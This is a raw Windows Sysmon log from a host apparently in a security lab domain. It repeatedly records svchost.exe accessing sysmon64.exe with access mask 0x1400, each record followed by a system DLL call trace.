09:20:17.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053140Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053139Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053138Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053137Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053136Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053135Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053134Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053133Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053132Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053131Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053130Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053129Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053128Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053127Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053126Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053125Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053124Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053123Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053122Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053121Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053120Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053119Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053118Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.999{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053117Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 